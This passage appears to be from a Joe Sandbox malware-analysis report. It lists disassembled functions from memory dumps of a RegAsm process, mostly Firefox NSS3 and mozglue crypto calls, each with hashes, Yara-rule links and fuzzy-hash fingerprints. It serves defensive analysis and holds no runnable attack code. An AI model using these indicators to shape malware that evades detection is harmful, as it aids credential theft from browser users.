                                                                                                          • Part of subcall function 6C1DE300: PR_Unlock.NSS3(?), ref: 6C1DE5BC
                                                                                                          • Part of subcall function 6C1DE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C1DE5CA
                                                                                                          • Part of subcall function 6C1DE300: TlsGetValue.KERNEL32 ref: 6C1DE5F2
                                                                                                          • Part of subcall function 6C1DE300: EnterCriticalSection.KERNEL32(?), ref: 6C1DE606
                                                                                                          • Part of subcall function 6C1DE300: PORT_Alloc_Util.NSS3(?), ref: 6C1DE613
                                                                                                        • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C1FAC92
                                                                                                        • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C1FAB3E), ref: 6C1FACD7
                                                                                                        • PORT_Alloc_Util.NSS3(?), ref: 6C1FAD10
                                                                                                        • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C1FAD2B
                                                                                                          • Part of subcall function 6C1DF360: TlsGetValue.KERNEL32(00000000,?,6C1FA904,?), ref: 6C1DF38B
                                                                                                          • Part of subcall function 6C1DF360: EnterCriticalSection.KERNEL32(?,?,?,6C1FA904,?), ref: 6C1DF3A0
                                                                                                          • Part of subcall function 6C1DF360: PR_Unlock.NSS3(?,?,?,?,6C1FA904,?), ref: 6C1DF3D3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 2926855110-0
                                                                                                        • Opcode ID: c549ccbfb7465b945b8dc2cc8e5da32fad915b9aaa32a1e42b3a56ffcfd73ff0
                                                                                                        • Instruction ID: 2ca8735b2dd38b3a85150595d37f9f2798ca927b70da4efe1c1937a6740c93bb
                                                                                                        • Opcode Fuzzy Hash: c549ccbfb7465b945b8dc2cc8e5da32fad915b9aaa32a1e42b3a56ffcfd73ff0
                                                                                                        • Instruction Fuzzy Hash: AE311BB1E006095FEB009F658C609AF77B6AF84718B198128E83557740EB35DD16C7A1
                                                                                                        Function 6C1D8C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_Now.NSS3 ref: 6C1D8C7C
                                                                                                          • Part of subcall function 6C279DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C2C0A27), ref: 6C279DC6
                                                                                                          • Part of subcall function 6C279DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C2C0A27), ref: 6C279DD1
                                                                                                          • Part of subcall function 6C279DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C279DED
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C1D8CB0
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1D8CD1
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C1D8CE5
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1D8D2E
                                                                                                        • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C1D8D62
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1D8D93
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3131193014-0
                                                                                                        • Opcode ID: 87a8cf2f6b782d2d0df238974a45e63372402d0ba95f171b9d36e0dbbf825666
                                                                                                        • Instruction ID: b8d2941d489b25f9834b65c8862e9fc6d2aafa98cce78c75736a95c5e77a0164
                                                                                                        • Opcode Fuzzy Hash: 87a8cf2f6b782d2d0df238974a45e63372402d0ba95f171b9d36e0dbbf825666
                                                                                                        • Instruction Fuzzy Hash: 1A312371A01605AFEB00AF68DC447DAB7B4BF15318F26013AEE1967B90D770B964C7D1
                                                                                                        Function 6C1D2E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C1CE728,?,00000038,?,?,00000000), ref: 6C1D2E52
                                                                                                        • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C1D2E66
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C1D2E7B
                                                                                                        • EnterCriticalSection.KERNEL32(00000000), ref: 6C1D2E8F
                                                                                                        • PL_HashTableLookup.NSS3(?,?), ref: 6C1D2E9E
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1D2EAB
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1D2F0D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                                        • String ID:
                                                                                                        • API String ID: 3106257965-0
                                                                                                        • Opcode ID: 73859f53a11b29ceae641d8152eeb86f43c519c97b1b0afc812d221087fe5706
                                                                                                        • Instruction ID: 4fdd1e7b59ddfe2bdba24cbffbec03cee14361556346530fdee1554ac3b59726
                                                                                                        • Opcode Fuzzy Hash: 73859f53a11b29ceae641d8152eeb86f43c519c97b1b0afc812d221087fe5706
                                                                                                        • Instruction Fuzzy Hash: 8531387AA00105AFEB00AF68DC4497AB778FF15258B058575EC1887B11E731ED64C7E2
                                                                                                        Function 6C21CEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PORT_ArenaMark_Util.NSS3(?,6C21CD93,?), ref: 6C21CEEE
                                                                                                          • Part of subcall function 6C2114C0: TlsGetValue.KERNEL32 ref: 6C2114E0
                                                                                                          • Part of subcall function 6C2114C0: EnterCriticalSection.KERNEL32 ref: 6C2114F5
                                                                                                          • Part of subcall function 6C2114C0: PR_Unlock.NSS3 ref: 6C21150D
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C21CD93,?), ref: 6C21CEFC
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C2110F3
                                                                                                          • Part of subcall function 6C2110C0: EnterCriticalSection.KERNEL32(?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21110C
                                                                                                          • Part of subcall function 6C2110C0: PL_ArenaAllocate.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211141
                                                                                                          • Part of subcall function 6C2110C0: PR_Unlock.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211182
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21119C
                                                                                                        • SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C21CD93,?), ref: 6C21CF0B
                                                                                                          • Part of subcall function 6C210840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C2108B4
                                                                                                        • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C21CD93,?), ref: 6C21CF1D
                                                                                                          • Part of subcall function 6C20FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C208D2D,?,00000000,?), ref: 6C20FB85
                                                                                                          • Part of subcall function 6C20FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C20FBB1
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C21CD93,?), ref: 6C21CF47
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C21CD93,?), ref: 6C21CF67
                                                                                                        • SECITEM_CopyItem_Util.NSS3(?,00000000,6C21CD93,?,?,?,?,?,?,?,?,?,?,?,6C21CD93,?), ref: 6C21CF78
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 4291907967-0
                                                                                                        • Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                        • Instruction ID: 31b4abe2a102d073f190f96ccec9704252e8380768d938b851043950036ada58
                                                                                                        • Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                        • Instruction Fuzzy Hash: AD11A5A5E0820D5BE700AA666C41B6B75EC9F5998EF04403AFE09D7F41FB70D90886F1
                                                                                                        Function 6C1C8C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1C8C1B
                                                                                                        • EnterCriticalSection.KERNEL32 ref: 6C1C8C34
                                                                                                        • PL_ArenaAllocate.NSS3 ref: 6C1C8C65
                                                                                                        • PR_Unlock.NSS3 ref: 6C1C8C9C
                                                                                                        • PR_Unlock.NSS3 ref: 6C1C8CB6
                                                                                                          • Part of subcall function 6C25DD70: TlsGetValue.KERNEL32 ref: 6C25DD8C
                                                                                                          • Part of subcall function 6C25DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C25DDB4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                        • String ID: KRAM
                                                                                                        • API String ID: 4127063985-3815160215
                                                                                                        • Opcode ID: 69b2c510cc2a83dcb3e6a30de63acae72ca1596ccd2a1375fd9154abd813fbb9
                                                                                                        • Instruction ID: f77b9e361f2867e4ca7dc2749b7508262d578e38fc72a0e1b024d12af08511f3
                                                                                                        • Opcode Fuzzy Hash: 69b2c510cc2a83dcb3e6a30de63acae72ca1596ccd2a1375fd9154abd813fbb9
                                                                                                        • Instruction Fuzzy Hash: 272180B16056058FE700AF78C4C46A9FBF4FF15308F06896EE8888B701DB39D895CB96
                                                                                                        Function 6C2C2C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_EnterMonitor.NSS3 ref: 6C2C2CA0
                                                                                                        • PR_ExitMonitor.NSS3 ref: 6C2C2CBE
                                                                                                        • calloc.MOZGLUE(00000001,00000014), ref: 6C2C2CD1
                                                                                                        • strdup.MOZGLUE(?), ref: 6C2C2CE1
                                                                                                        • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C2C2D27
                                                                                                        Strings
                                                                                                        • Loaded library %s (static lib), xrefs: 6C2C2D22
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                        • String ID: Loaded library %s (static lib)
                                                                                                        • API String ID: 3511436785-2186981405
                                                                                                        • Opcode ID: e37a939c1fe3ea31492d7a237b8e64fe5f72c29f85ee91b76c78ac482163afae
                                                                                                        • Instruction ID: e460fd3c7c76fbe9490af2930b1405aa74119848e480987b674e1ddef75d9b8d
                                                                                                        • Opcode Fuzzy Hash: e37a939c1fe3ea31492d7a237b8e64fe5f72c29f85ee91b76c78ac482163afae
                                                                                                        • Instruction Fuzzy Hash: D611E6F57003089FEB509F14D849AA677B8AB56359F04822DEC0987F41DB32D918CBA2
                                                                                                        Function 6C1B68E0 Relevance: 10.6, APIs: 7, Instructions: 56COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1B68FB
                                                                                                        • EnterCriticalSection.KERNEL32 ref: 6C1B6913
                                                                                                        • PORT_FreeArena_Util.NSS3 ref: 6C1B693E
                                                                                                        • PR_Unlock.NSS3 ref: 6C1B6946
                                                                                                        • DeleteCriticalSection.KERNEL32 ref: 6C1B6951
                                                                                                        • free.MOZGLUE ref: 6C1B695D
                                                                                                        • PR_Unlock.NSS3 ref: 6C1B6968
                                                                                                          • Part of subcall function 6C25DD70: TlsGetValue.KERNEL32 ref: 6C25DD8C
                                                                                                          • Part of subcall function 6C25DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C25DDB4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$UnlockValue$Arena_DeleteEnterFreeLeaveUtilfree
                                                                                                        • String ID:
                                                                                                        • API String ID: 1628394932-0
                                                                                                        • Opcode ID: b5b3721a430415f128336e8581e0e5ac5bec53786e2648e7f28ae52e2ebed356
                                                                                                        • Instruction ID: 319b208a1ba44e5a4e33dfa83a4c0475b442dee5ea3beb9d3cb9013c1999a6fd
                                                                                                        • Opcode Fuzzy Hash: b5b3721a430415f128336e8581e0e5ac5bec53786e2648e7f28ae52e2ebed356
                                                                                                        • Instruction Fuzzy Hash: 7D114CB56046098FDB00AF78D08856EBBF8FF16644F01456DEC99DB601EB30D898CBA2
                                                                                                        Function 6C210FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C1B87ED,00000800,6C1AEF74,00000000), ref: 6C211000
                                                                                                        • PR_NewLock.NSS3(?,00000800,6C1AEF74,00000000), ref: 6C211016
                                                                                                          • Part of subcall function 6C2798D0: calloc.MOZGLUE(00000001,00000084,6C1A0936,00000001,?,6C1A102C), ref: 6C2798E5
                                                                                                        • PL_InitArenaPool.NSS3(00000000,security,6C1B87ED,00000008,?,00000800,6C1AEF74,00000000), ref: 6C21102B
                                                                                                        • TlsGetValue.KERNEL32(00000000,?,?,6C1B87ED,00000800,6C1AEF74,00000000), ref: 6C211044
                                                                                                        • free.MOZGLUE(00000000,?,00000800,6C1AEF74,00000000), ref: 6C211064
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: calloc$ArenaInitLockPoolValuefree
                                                                                                        • String ID: security
                                                                                                        • API String ID: 3379159031-3315324353
                                                                                                        • Opcode ID: d5834cc715b29bbd50885923fe23235b0dce94f99843cd541ff156ad2eb7be18
                                                                                                        • Instruction ID: 60807dbccb6e87a9a814e1a4c8d151e837ebaa5406587dd850d89b58d042645a
                                                                                                        • Opcode Fuzzy Hash: d5834cc715b29bbd50885923fe23235b0dce94f99843cd541ff156ad2eb7be18
                                                                                                        • Instruction Fuzzy Hash: 6A014831E182585FE7202F2C9C05B5676E8BF26749F00012AEE0896E51EF71C195DBE2
                                                                                                        Function 0041FA24 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Name::operator+$NameName::
                                                                                                        • String ID: throw(
                                                                                                        • API String ID: 168861036-3159766648
                                                                                                        • Opcode ID: acf3c3f6b62bbe0bf60cea1499b19d7b2d2c206c409909a41351c69a4c2d4579
                                                                                                        • Instruction ID: f88cabbda18bcd4624fad7201f608a4b7bec8680ec46b3ab11068729d5ffd4ff
                                                                                                        • Opcode Fuzzy Hash: acf3c3f6b62bbe0bf60cea1499b19d7b2d2c206c409909a41351c69a4c2d4579
                                                                                                        • Instruction Fuzzy Hash: 87019B70600208BFCF14EF64D852EED77B5EF44748F10406AF905972A5DA78EA8B878C
                                                                                                        Function 6C252E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C253046
                                                                                                          • Part of subcall function 6C23EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C23EE85
                                                                                                        • PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C227FFB), ref: 6C25312A
                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C253154
                                                                                                        • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C252E8B
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                          • Part of subcall function 6C23F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C229BFF,?,00000000,00000000), ref: 6C23F134
                                                                                                        • memcpy.VCRUNTIME140(8B3C75C0,?,6C227FFA), ref: 6C252EA4
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C25317B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Error$memcpy$K11_Value
                                                                                                        • String ID:
                                                                                                        • API String ID: 2334702667-0
                                                                                                        • Opcode ID: 80824b8f887687b74d0046943b0a3a81b8fb426b4582ed07ac2c1880aec5d493
                                                                                                        • Instruction ID: 08346025a3f32c5bfbf72b8b54280cafc0753dfc74787f87bd70bde3920a685c
                                                                                                        • Opcode Fuzzy Hash: 80824b8f887687b74d0046943b0a3a81b8fb426b4582ed07ac2c1880aec5d493
                                                                                                        • Instruction Fuzzy Hash: F3A19CB5A002199FDB24CF54CC80BABB7B5EF49308F048199ED4967781E731AD59CFA1
                                                                                                        Function 6C21ED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C21ED6B
                                                                                                        • PORT_Alloc_Util.NSS3(00000000), ref: 6C21EDCE
                                                                                                          • Part of subcall function 6C210BE0: malloc.MOZGLUE(6C208D2D,?,00000000,?), ref: 6C210BF8
                                                                                                          • Part of subcall function 6C210BE0: TlsGetValue.KERNEL32(6C208D2D,?,00000000,?), ref: 6C210C15
                                                                                                        • free.MOZGLUE(00000000,?,?,?,?,6C21B04F), ref: 6C21EE46
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C21EECA
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C21EEEA
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C21EEFB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
